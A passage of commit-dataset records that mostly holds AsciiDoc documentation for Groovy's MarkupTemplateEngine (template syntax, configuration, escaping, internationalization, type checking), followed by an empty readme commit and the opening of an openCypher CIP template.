native support for internationalization. For that, when you create the `TemplateConfiguration`, you can provide\na `Locale` which is the default locale to be used for templates. Each template may have different versions, one for each locale. The\nname of the template makes the difference:\n\n* `file.tpl`: default template file\n* `file_fr_FR.tpl`: french version of the template\n* `file_en_US.tpl`: american english version of the template\n* ...\n\nWhen a template is rendered or included, then:\n\n* if the template name or include name *explicitly* sets a locale, the *specific* version is included, or the default version if not found\n* if the template name doesn't include a locale, the version for the `TemplateConfiguration` locale is used, or the default version if not found\n\nFor example, imagine the default locale is set to `Locale.ENGLISH` and that the main template includes:\n\n[source,groovy]\n.Use an explicit locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import,indent=0]\n----\n\nthen the template is rendered using the specific template:\n\n[source,html]\n.Bypass the template configuration\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import_expected,indent=0]\n----\n\nUsing an include without specifying a locale will make the template engine look for a template with the configured locale, and if not, fallback to the default, like here:\n\n[source,groovy]\n.Don't use a locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import,indent=0]\n----\n\n[source,html]\n.Fallback to the default template\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected,indent=0]\n----\n\nHowever, changing the default locale of the template engine to `Locale.FRANCE` will change the output, because the template engine will now look for a file\nwith the `fr_FR` locale:\n\n[source,html]\n.Don't fallback to the default template because a locale specific template was found\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected2,indent=0]\n----\n\nThis strategy lets you translate your templates one by one, by relying on default templates, for which no locale is set in the file name.\n\n[[markuptemplate-basetemplate]]\n=== Custom template classes\n\nBy default, templates created inherit the `groovy.text.markup.BaseTemplate` class. It may be interesting for an application to provide a different\ntemplate class, for example to provide additional helper methods which are aware of the application, or customized rendering primitives (for HTML,\nfor example).\n\nThe template engine provides this ability by setting an alternative `baseTemplateClass` in the `TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_config,indent=0]\n----\n\nThe custom base class has to extend `BaseClass` like in this example:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MyTemplate.groovy[tags=basetemplate_class,indent=0]\n----\n\nThis example shows a class which provides an additional method named `hasModule`, which can then be used directly in the template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_template,indent=0]\n----\n\n== Type checked templates\n=== Optional type checking\n\nEven if templates are not type checked, they are statically compiled. This means that once the templates are compiled, performance should be very good. For some\napplications, it might be good to make sure that templates are valid before they are actually rendered. This means failing template compilation, for example, if\na method on a model variable doesn't exist.\n\nThe `MarkupTemplateEngine` provides such a facility. Templates can be optionally type checked. For that, the developer must provide additional information at\ntemplate creation time, which is the types of the variables found in the model. Imagine a model exposing a list of pages, where a page is defined as:\n\n[source,groovy]\n.Page.groovy\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=page_class,indent=0]\n----\n\nThen a list of pages can be exposed in the model, like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_no_stc,indent=0]\n----\n\nA template can use it easily:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_template,indent=0]\n----\n<1> iterate on pages from the model\n<2> `page.title` is valid\n<3> `page.text` is *not* (should be `page.body`)\n\nWithout type checking, the compilation of the template succeeds, because the template engine doesn't know about the model until a page\nis actually rendered. This means that the problem would only surface at runtime, once the page is rendered:\n\n.Runtime error\n----\nNo such property: text\n----\n\nIn some situations, this can be complicated to sort out or even notice. By declaring the type of the `pages` to the template engine, we're now capable of failing at compile time:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_fixed,indent=0]\n----\n<1> create a map which will hold the model types\n<2> declare the type of the `pages` variables (note the use of a string for the type)\n<3> use `createTypeCheckedModelTemplate` instead of `createTemplate`\n\nThis time, when the template is compiled at the last line, an error occurs:\n\n.Template compilation time error\n----\n[Static type checking] - No such property: text for class: Page\n----\n\nThis means that you don't need to wait for the page to be rendered to see an error. The use of `createTypeCheckedModelTemplate` is mandatory.\n\n=== Alternative declaration of types\n\nAlternatively, if the developer is also the one who writes the templates, it is possible to declare the types of the expected variables\ndirectly in the template. In this case, even if you call `createTemplate`, it will be type checked:\n\n[source,groovy]\n.Inline declaration of types\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_inlined_template,indent=0]\n----\n<1> types need to be declared in the `modelTypes` header\n<2> declare one variable per object in the model\n\n=== Performance of type checked templates\n\nAn additional interest of using type checked models is that performance should improve. By telling the type checker what are the expected types,\nyou also let the compiler generate optimized code for that, so if you are looking for the best performance, consider using type checked templates.\n\n","old_contents":"= The MarkupTemplateEngine\n\nThis template engine is a template engine primarily aimed at generating XML-like markup (XML, XHTML, HTML5, ...). Unlike\ntraditional template engines, this one relies on a DSL that uses the builder syntax. Here is a sample template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template,indent=0]\n----\n\nIf you feed it with the following model:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_model,indent=0]\n----\n\nIt would be rendered as:\n\n[source,xml]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_expected,indent=0]\n----\n\nThe key features of this template engine are:\n\n* a _markup builder like_ syntax\n* templates are compiled into bytecode\n* fast rendering\n* optional type checking of the model\n* includes\n* internationalization support\n\n== The template format\n=== Basics\n\nTemplates consist of Groovy code. Let's explore the first example more throughfully:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example1_template_with_bullets,indent=0]\n----\n<1> renders the XML declaration string.\n<2> opens a `cars` tag\n<3> `cars` is a variable found in the _template model_, which is a list of `Car` instances\n<4> for each item, we create a `car` tag with the attributes from the `Car` instance\n<5> closes the `cars` tag\n\nAs you can see, regular Groovy code can be used in the template. Here, we are calling `each` on a list (retrieved from the model), allowing us to\nrender one `car` tag per entry.\n\nIn a similar fashion, rendering HTML code is as simple as this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_template,indent=0]\n----\n<1> renders the HTML doctype special tag\n<2> opens the `html` tag with an attribute\n<3> opens the `head` tag\n<4> renders a `meta` tag with one `http-equiv` attribute\n<5> renders the `title` tag\n<6> closes the `head` tag\n<7> opens the `body` tag\n<8> renders a `p` tag\n<9> closes the `body` tag\n<10> closes the `html` tag\n\nThe output is straightforward:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=example2_expected,indent=0]\n----\n\nNOTE: With some <<markuptemplate-config,configuration>>, you can have the output pretty printed, with newlines and indent automatically added.\n\n=== Support methods\n\nIn the previous example, the doctype declaration was rendered using the `yieldUnescaped` method. We have also seen the `xmlDeclaration` method.\nThe template engine provides several support methods that will help you render contents appropriately:\n\n[cols=\"1,2,3a\",options=\"header\"]\n|=======================================================================\n|Method|Description|Example\n|yield\n|Renders contents, but escapes it before rendering\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yield_expected,indent=0]\n```\n|yieldUnescaped\n|Renders raw contents. The argument is rendered as is, without escaping.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=yieldUnescaped_expected,indent=0]\n```\n\n|xmlDeclaration\n|Renders an XML declaration String. If the encoding is specified in the configuration, it is written in the declaration.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|comment\n|Renders raw contents inside an XML comment\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=comment_expected,indent=0]\n```\n\n|newLine\n|Renders a new line. See also `TemplateConfiguration#setAutoNewLine` and `TemplateConfiguration#setNewLineString`.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newline_expected,indent=0]\n```\n\n|pi\n|Renders an XML processing instruction.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi,indent=0]\n```\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=pi_expected,indent=0]\n```\n\n|tryEscape\n|Returns an escaped string for an object, if it is a `String` (or any type derived from `CharSequence`). Otherwise returns the object itself.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=tryEscape_expected,indent=0]\n```\n\n|=======================================================================\n\n=== Includes\n\nThe `MarkupTemplateEngine` supports inclusion of contents from another file. Included contents may be:\n\n* another template\n* raw contents\n* contents to be escaped\n\nIncluding another template can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_template,indent=0]\n----\n\nIncluding a file as raw contents, without escaping it, can be done like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_raw,indent=0]\n----\n\nEventually, inclusion of text that should be escaped before rendering can be done using:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=include_escaped,indent=0]\n----\n\nAlternatively, you can use the following helper methods instead:\n\n* `includeGroovy(<name>)` to include another template\n* `includeEscaped(<name>)` to include another file with escaping\n* `includeUnescaped(<name>)` to include another file without escaping\n\nCalling those methods instead of the `include xxx:` syntax can be useful if the name of the file to be included is dynamic (stored in a variable for example).\nFiles to be included (independently of their type, template or text) are found on *classpath*. This is one of the reasons why the `MarkupTemplateEngine` takes\nan optional `ClassLoader` as constructor argument (the other reason being that you can include code referencing other classes in a template).\n\nIf you don't want your templates to be on classpath, the `MarkupTemplateEngine` accepts a convenient constructor that lets you define the directory where\ntemplates are to be found.\n\n== Rendering contents\n=== Creation of a template engine\nOn the server side, rendering templates require an instance of `groovy.text.markup.MarkupTemplateEngine` and a\n`groovy.text.markup.TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_setup,indent=0]\n----\n<1> creates a template configuration\n<2> creates a template engine with this configuration\n<3> creates a template instance from a `String`\n<4> creates a model to be used in the template\n<5> bind the model to the template instance\n<6> render output\n\nThere are several possible options to parse templates:\n\n* from a `String`, using `createTemplate(String)`\n* from a `Reader`, using `createTemplate(Reader)`\n* from a `URL`, using `createTemplate(URL)`\n* given a template name, using `createTemplateByPath(String)`\n\nThe last version should in general be preferred:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=rendering_by_name,indent=0]\n----\n\n[[markuptemplate-config]]\n=== Configuration options\n\nThe behavior of the engine can be tweaked with several configuration options accessible through the `TemplateConfiguration` class:\n\n[cols=\"1,1,2,3a\",options=\"header\"]\n|=======================================================================\n|Option|Default value|Description|Example\n|declarationEncoding\n|null\n|Determines the value of the encoding to be written when `xmlDeclaration` is called. It does *not* influence the writer you are using as output.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_expected,indent=0]\n```\n\nIf `TemplateConfiguration#getDeclarationEncoding` is not null:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=xmlDeclaration_encoding_expected,indent=0]\n```\n\n|expandEmptyElements\n|false\n|If true, empty tags are rendered in their expanded form.\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_false,indent=0]\n```\n\nIf `expandEmptyElements` is true:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=expandEmptyElements_true,indent=0]\n```\n\n|useDoubleQuotes\n|false\n|If true, use double quotes for attributes instead of simple quotes\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes,indent=0]\n```\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_false,indent=0]\n```\n\nIf `useDoubleQuotes` is true:\n\n*Output*:\n```xml\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=useDoubleQuotes_true,indent=0]\n```\n\n|newLineString\n|System default (system property `line.separator`)\n|Allows to choose what string is used when a new line is rendered\n|*Template*:\n```groovy\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString,indent=0]\n```\n\nIf `newLineString='BAR'`:\n\n*Output*:\n```html\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=newLineString_expected,indent=0]\n```\n\n|autoEscape\n|false\n|If true, variables from models are automatically escaped before rendering.\n|See <<markuptemplate-autoescape, the auto escape section>>\n\n|autoIndent\n|false\n|If true, performs automatic indentation after new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoIndentString\n|four (4) spaces\n|The string to be used as indent.\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|autoNewLine\n|false\n|If true, performs automatic insertion of new lines\n|See <<markuptemplate-autoformat, the auto formatting section>>\n\n|baseTemplateClass\n|`groovy.text.markup.BaseTemplate`\n|Sets the super class of compiled templates. This can be used to provide application specific templates.\n|See <<markuptemplate-basetemplate, the custom templates section>>\n\n|locale\n|Default locale\n|Sets the default locale for templates.\n|See <<markuptemplate-i18n, the internationalization section>>\n\n|=======================================================================\n\nWARNING: Once the template engine has been created, it is *unsafe* to change the configuration.\n\n[[markuptemplate-autoformat]]\n=== Automatic formatting\n\nBy default, the template engine will render output without any specific formatting. Some <<markuptemplate-config,configuration options>> can improve the situation:\n\n* `autoIndent` is responsible for auto-indenting after a new line is inserted\n* `autoNewLine` is responsible for automatically inserting new lines based on the original formatting of the template source\n\nIn general, it is recommanded to set both `autoIndent` and `autoNewLine` to true if you want human-readable, pretty printed, output:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_setup,indent=0]\n----\n\nUsing the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template,indent=0]\n----\n\nThe output will now be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template_expected,indent=0]\n----\n\nWe can slightly change the template so that the `title` intruction is found on the same line as the `head` one:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2,indent=0]\n----\n\nAnd the output will reflect that:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template2_expected,indent=0]\n----\n\nNew lines are *only* inserted where curly braces for tags are found, and the insertion corresponds to where the nested content is found. This means that\ntags in the body of another tag will *not* trigger new lines unless they use curly braces themselves:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3,indent=0]\n----\n<1> a new line is inserted because `meta` is not on the same line as `head`\n<2> no new line is inserted, because we're on the same depth as the previous tag\n<3> we can force rendering of a new line by explicitly calling `newLine`\n<4> and this tag will be rendered on a separate line\n\nThis time, the output will be:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoformat_template3_expected,indent=0]\n----\n\nBy default, the renderer uses four(4) spaces as indent, but you can change it by setting the `TemplateConfiguration#autoIndentString` property.\n\n[[markuptemplate-autoescape]]\n=== Automatic escaping\n\nBy default, contents which is read from the model is rendered *as is*. If this contents comes from user input, it can be sensible, and you might\nwant to escape it by default, for example to avoid XSS injection. For that, the template configuration provides an option which will automatically\nescape objects from the model, as long as they inherit from `CharSequence` (typically, `String`s).\n\nLet's imagine the following setup:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup,indent=0]\n----\n\nand the following template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template,indent=0]\n----\n\nThen you wouldn't want the HTML from `unsafeContents` to be rendered as is, because of potential security issues:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_expected,indent=0]\n----\n\nAutomatic escaping will fix this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_setup_fixed,indent=0]\n----\n\nAnd now the output is properly escaped:\n\n[source,html]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_fixed_expected,indent=0]\n----\n\nNote that using automatic escaping doesn't prevent you from including unescaped contents from the model. To do this, your template should then explicitly\nmention that a model variable should not be escaped by prefixing it with `unescaped.`, like in this example:\n\n[source,html]\n.Explicit bypass of automatic escaping\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=autoescape_template_unescaped,indent=0]\n----\n\n[[markuptemplate-i18n]]\n=== Internationalization\n\nThe template engine has native support for internationalization. For that, when you create the `TemplateConfiguration`, you can provide\na `Locale` which is the default locale to be used for templates. Each template may have different versions, one for each locale. The\nname of the template makes the difference:\n\n* `file.tpl`: default template file\n* `file_fr_FR.tpl`: french version of the template\n* `file_en_US.tpl`: american english version of the template\n* ...\n\nWhen a template is rendered or included, then:\n\n* if the template name or include name *explicitly* sets a locale, the *specific* version is included, or the default version if not found\n* if the template name doesn't include a locale, the version for the `TemplateConfiguration` locale is used, or the default version if not found\n\nFor example, imagine the default locale is set to `Locale.ENGLISH` and that the main template includes:\n\n[source,groovy]\n.Use an explicit locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import,indent=0]\n----\n\nthen the template is rendered using the specific template:\n\n[source,html]\n.Bypass the template configuration\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_explicit_import_expected,indent=0]\n----\n\nUsing an include without specifying a locale will make the template engine look for a template with the configured locale, and if not, fallback to the default, like here:\n\n[source,groovy]\n.Don't use a locale in include\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import,indent=0]\n----\n\n[source,html]\n.Fallback to the default template\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected,indent=0]\n----\n\nHowever, changing the default locale of the template engine to `Locale.FRANCE` will change the output, because the template engine will now look for a file\nwith the `fr_FR` locale:\n\n[source,html]\n.Don't fallback to the default template because a locale specific template was found\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=locale_implicit_import_expected2,indent=0]\n----\n\nThis strategy lets you translate your templates one by one, by relying on default templates, for which no locale is set in the file name.\n\n[[markuptemplate-basetemplate]]\n=== Custom template classes\n\nBy default, templates created inherit the `groovy.text.markup.BaseTemplate` class. It may be interesting for an application to provide a different\ntemplate class, for example to provide additional helper methods which are aware of the application, or customized rendering primitives (for HTML,\nfor example).\n\nThe template engine provides this ability by setting an alternative `baseTemplateClass` in the `TemplateConfiguration`:\n\n[source,java]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_config,indent=0]\n----\n\nThe custom base class has to extend `BaseClass` like in this example:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MyTemplate.groovy[tags=basetemplate_class,indent=0]\n----\n\nThis example shows a class which provides an additional method named `hasModule`, which can then be used directly in the template:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=custombase_template,indent=0]\n----\n\n== Type checked templates\n=== Optional type checking\n\nEven if templates are not type checked, they are statically compiled. This means that once the templates are compiled, performance should be very good. For some\napplications, it might be good to make sure that templates are valid before they are actually rendered. This means failing template compilation, for example, if\na method on a model variable doesn't exist.\n\nThe `MarkupTemplateEngine` provides such a facility. Templates can be optionally type checked. For that, the developer must provide additional information at\ntemplate creation time, which is the types of the variables found in the model. Imagine a model exposing a list of pages, where a page is defined as:\n\n[source,groovy]\n.Page.groovy\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=page_class,indent=0]\n----\n\nThen a list of pages can be exposed in the model, like this:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_no_stc,indent=0]\n----\n\nA template can use it easily:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_template,indent=0]\n----\n<1> iterate on pages from the model\n<2> `page.title` is valid\n<3> `page.text` is *not* (should be `page.body`)\n\nWithout type checking, the compilation of the template succeeds, because the template engine doesn't know about the model until a page\nis actually rendered. This means that the problem would only surface at runtime, once the page is rendered:\n\n.Runtime error\n----\nNo such property: text\n----\n\nIn some situations, this can be complicated to sort out or even notice. By declaring the type of the `pages` to the template engine, we're now capable of failing at compile time:\n\n[source,groovy]\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_setup_fixed,indent=0]\n----\n<1> create a map which will hold the model types\n<2> declare the type of the `pages` variables (note the use of a string for the type)\n<3> use `createTypeCheckedModelTemplate` instead of `createTemplate`\n\nThis time, when the template is compiled at the last line, an error occurs:\n\n.Template compilation time error\n----\n[Static type checking] - No such property: text for class: Page\n----\n\nThis means that you don't need to wait for the page to be rendered to see an error. The use of `createTypeCheckedModelTemplate` is mandatory.\n\n=== Alternative declaration of types\n\nAlternatively, if the developer is also the one who writes the templates, it is possible to declare the types of the expected variables\ndirectly in the template. In this case, even if you call `createTemplate`, it will be type checked:\n\n[source,groovy]\n.Inline declaration of types\n----\ninclude::{rootdir}\/subprojects\/groovy-templates\/src\/spec\/test\/MarkupTemplateEngineSpecTest.groovy[tags=typechecked_inlined_template,indent=0]\n----\n<1> types need to be declared in the `modelTypes` header\n<2> declare one variable per object in the model\n\n=== Performance of type checked templates\n\nAn additional interest of using type checked models is that performance should improve. By telling the type checker what are the expected types,\nyou also let the compiler generate optimized code for that, so if you are looking for the best performance, consider using type checked templates.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d753f9e206b86f5b3c7a98dd646b86ff160f74a2","subject":"Update readme.asciidoc","message":"Update readme.asciidoc","repos":"ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials,ooms\/materials,devoxx4kids\/materials,ooms\/materials,ooms\/materials,devoxx4kids\/materials,devoxx4kids\/materials","old_file":"workshops\/minecraft\/readme.asciidoc","new_file":"workshops\/minecraft\/readme.asciidoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"45056d08d700df2264ffb50e33bd2e751785184e","subject":"Amended the formatting of the CIP template","message":"Amended the formatting of the CIP template\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP-Template.adoc","new_file":"cip\/CIP-Template.adoc","new_contents":"= CIP<CCYY>-<MM>-<DD> - <The title of the CIP>\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Author:* <Author name> <Author email>\n\n[IMPORTANT]\n.Guidelines\n====\n* Please use this template as a guide.\n To aid clarity and give an idea of what the pertinent section denotes, some headings have example text.\n\n* The file naming convention is _CIP<CCYY>-<MM>-<DD>-short-title-words.adoc_.\n\n* Label the pull request for the CIP with the correct Cypher vocabulary(ies).\n\n* The CIP may only consider Cypher language features.\n This means the CIP must make no mention of Neo4j.\n\n* Format Cypher and EBNF for readability.\n\n* Write one sentence per line.\n====\n\n[abstract]\n.Abstract\n--\nThis is a high-level summary of the aim and description of the CIP.\n--\n\ntoc::[]\n\n\n== Motivation\n\nProvide the rationale and justification for the proposed feature(s).\n\n== Background\n\nThis is further background regarding the CIP, should it be required or deemed useful.\n\nPlease ensure that links to related documents (including other CIPs) are provided.\n\n== Proposal\n\nThis comprises the detail of the CIP, and is divided into the sub-sections below.\n\n=== Examples\n\nFor each aspect of the proposed feature(s), provide at least one Cypher example query to show how the feature is envisaged to work, along with explanatory text.\n\n_An example of this is shown below:_\n\n[source, cypher]\n.Find all persons whose name starts with \"And\"\n----\nMATCH (a:Person) WHERE a.name STARTS WITH 